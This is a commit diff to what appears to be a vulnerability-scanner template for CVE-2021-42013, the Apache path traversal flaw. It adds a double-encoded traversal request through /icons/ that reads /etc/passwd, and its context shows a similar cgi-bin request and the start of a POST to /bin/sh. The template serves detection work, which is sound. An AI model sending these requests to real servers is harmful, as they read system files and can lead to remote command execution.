feature: Adding additional path for LFI detection (#5158)

cves/2021/CVE-2021-42013.yaml

@@ -25,6 +25,11 @@ requests:
         GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
         Host: {{Hostname}}
         Origin: {{BaseURL}}
+      
+      - |+
+        GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
 
       - |+
         POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1